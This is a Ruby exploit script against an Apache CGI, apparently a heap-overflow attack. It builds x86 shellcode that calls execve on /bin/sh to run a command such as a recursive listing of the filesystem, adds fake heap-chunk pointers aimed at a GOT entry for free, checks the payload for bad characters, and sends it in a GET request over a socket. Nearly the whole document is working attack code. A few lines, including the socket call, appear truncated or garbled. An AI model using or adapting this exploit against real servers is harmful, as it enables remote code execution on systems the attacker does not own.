require 'socket' sc = "\xeb\x34" << # jump callme "\x5e" << "\x89\x76\x70" << # *argv = /bin/sh "\x8d\x46\x10" << # +3: lea 1b(%esi), %eax // 1b=offset du nick "\x89\x46\x74" << # +3: mov %eax, 74(%esi) "\x8d\x46\x14" << # +3: lea 1e(%esi), %eax // 1e=offset du mail "\x89\x46\x78" << # +3: mov %eax, 78(%esi) "\x31\xc0" << "\x88\x46\x0e" << # z-terminate exe "\x88\x46\x12" << # +3: z-terminate nick "\x88\x46\x21" << # +3: z-terminate mail "\x89\x46\x7c" << # *envp = 0 "\xb0\x08" << # nr_execve = 0xb = 0x9++ ++ "\x40\x40\x40" << "\x89\xf3" << "\x8d\x4e\x70" << # argv= "\x8d\x56\x7c" << # envp= "\xcd\x80\x31\xdb\x89\xd8\x40\xcd" << "\x80\xe8\xc7\xff\xff\xff" << # call back # "/bin/ls+++++++++-lR+/+" "/etc/" # 0123456789abcdef0123456789abcdef01 #sc="\x68\x31\x32\x33\x34\x89\xe1\x31\xdb\x43\x31\xd2\x42\x42\x42\x42\x89\xd0\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80" #sc = "\xf3\x90\xeb\xfc" jmpfwd = "\x90\x90\x90\x90\x90\x90\x90\xb8xxxx" gotfree = 0x0804af38 bufaddr = 0x0804af70 #bufaddr = 0x0804afb8 bufaddr = $1.hex if ARGV.join =~ /bufaddr(?:0x)([a-fA-F0-9]{0,8})/ fd = gotfree - 12 # here that creates a space, which make apache fuck everything up => +8 bk = bufaddr + 0x18 + 8 #cgi = [fd, bk].pack('LL') # must be a valid dir/file (otherwise apache blocks us before hitting the cgi) cgi = '' req = [fd, bk].pack('LL') + 'suuxoorz' req += (jmpfwd + sc) req = req.ljust(252-cgi.length, 'x') + [0x30303030].pack('L') + 'x' docrootlen = 31 docrootlen = $1.to_i if ARGV.join =~ /docrootlen(\d+)/ req << 'x' while (docrootlen + cgi.length + req.length) % 8 != 4 fullreq = cgi + '?' + req fullreq = '?'+[0xdeadbabe].pack('L') if ARGV.include? 'deadbabe' [0x20, 0x9, 0xa, 0xb, 0xc, 0xd, 0x0].each { |c| if fullreq.index(c.chr) puts "Invalid character #{c.to_s(16)} at #{fullreq.index(c.chr)}" end } if ARGV.include? 'print' puts fullreq exit end #p fullreq puts fullreq.unpack('C*').map{ |e| "%x " % e }.join host = '' host = 'localhost' if ARGV.include? 'local', 80) { |s| s.write "GET #{fullreq} HTTP/1.0\r\n\r\n" 10.times { sleep 0.1 print } } puts